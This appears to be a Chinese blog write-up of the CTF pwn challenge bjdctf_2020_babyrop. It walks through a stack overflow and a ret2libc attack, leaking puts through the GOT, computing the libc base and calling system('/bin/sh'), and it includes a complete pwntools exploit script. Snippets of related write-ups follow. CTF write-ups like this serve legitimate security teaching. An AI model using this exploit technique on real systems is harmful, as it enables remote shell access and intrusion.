bjdctf_2020_babyrop

最新推荐文章于 2022-10-27 10:12:51 发布
原创 最新推荐文章于 2022-10-27 10:12:51 发布 · 719 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #python #CTF #WriteUp #网络安全

该篇博客详细介绍了如何利用一个开启了栈不可执行保护但没有开启其他保护机制的程序中的栈溢出漏洞,通过ret2libc技术来获取shell。首先,通过puts()函数泄露函数地址,然后计算libc基址,找到system()和/bin/bash的地址,最后构造payload实现getshell。整个过程包括泄露puts()地址、计算libc基址和执行system('/bin/bash')。
部署运行你感兴趣的模型镜像

bjdctf_2020_babyrop

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行。

先放进IDA中分析:
在这里插入图片描述

  • 主程序中给了vuln()函数,直接跟进查看。

vuln()
在这里插入图片描述

  • return read(0, &buf, 0x64uLL);:读取用户输入的数据存入buf变量。

题目思路

  • buf变量距离rbp 0x20

  • buf变量可读入0x64大小的数据。

  • 因此存在栈溢出。

  • 且程序中无system()函数和/bin/bash字符串。

  • 可以使用ret2libc方式getshell

步骤解析

首先利用栈溢出去泄露函数的真实地址,程序中只有puts()函数可以打印,所以只能用这个函数去泄露了,同时泄露的地址也用puts@got也没问题。

得到puts()的真实地址之后就可以计算出libc的基地址,从而得到system()/bin/bash的地址。

在这里插入图片描述

再通过一次栈溢出来实现getshell

在这里插入图片描述

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",26823)
# r = process("../buu/bjdctf_2020_babyrop")
elf = ELF("../buu/bjdctf_2020_babyrop")
libc = ELF("../buu/ubuntu16(64).so")

#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400733
main_addr = elf.symbols['main']

#attack
r.recv()
payload = b'M'*(0x20 + 8) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendline(payload)
puts_addr = u64(r.recv(6).ljust(8, b'\x00'))
print("puts_addr: " + hex(puts_addr))

#libc
base_addr = puts_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))
print("system_addr: " + hex(system_addr))
print("bin_sh_addr: " + hex(bin_sh_addr))

#attack2
payload = b'M'*(0x20 + 8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) + p64(main_addr)
r.sendline(payload)

r.interactive()

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 547
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 3602
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
bjdctf_2020_babyrop【BUUCTF
qq_41696518的博客
08-31 563
bjdctf_2020_babyrop
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 613
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
CTFbjdctf_2020_babyrop
凉水的博客
06-18 895
bjdctf_2020_babyrop
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 366
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
BUUCTF bjdctf_2020_babyrop
红叶的博客
10-27 871
今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。使用 1 的 Libc 即可获取shell。ROPgadget找pop rdi。gdb动态调试查看需要覆盖的数量。打开IDA Pro看一眼。ret2libc的做法。首先checksec。
[PWN] BUUCTF bjdctf_2020_babyrop
空城惜梦的博客
06-04 686
构造常规的ROP链,三种找到libc版本的方法分析寻找libc版本1.利用LibcSearcher来查找libc版本payload2.通过特殊网址来查找libc版本3.通过gdb来查找libc版本payload 分析 按照惯例checksce ,发现开了NX和RELRO 运行程序,查看程序的运行逻辑,从图中的红框可以猜测是一道泄露libc的题目 接着用IDA查看程序中主要函数存在的漏洞,可以看到 buf这个字符串数组只有0x20字节,而read却可以读取0x64个字节,所以这里存在着栈溢出 shift
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 502
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
BUUCTF(pwn)bjdctf_2020_babyrop
半岛铁盒的博客
03-31 519
from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',25519) elf=ELF('./2') main=0x4006ad rdi=0x400733 puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] payload='a'*(0x20+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main) p.sendl...
bjdctf2020 babyrop
pondzhang的专栏
05-09 362
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
bjdctf_2020_babyrop2
qq_33010875的博客
09-26 477
环境:WSL2,ubuntu16.04,python2 checksec文件: PIE保护没开,构造rop链 存在Canary,需要找出Canary的值才能进行地址泄露 文件拖入ida: 在gift函数发现printf格式化漏洞,可以利用该漏洞获取Canary的值,但需要找出输入点参数在栈上的相对位置(找偏移量) 由于scanf限制了只能输入6个字符,因此不能用 AAAA %x %x %x....... 来泄露值,改为: aa%6$p #6是一步步试出来的,可以从1开始尝试,p是十六进制形式 结
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值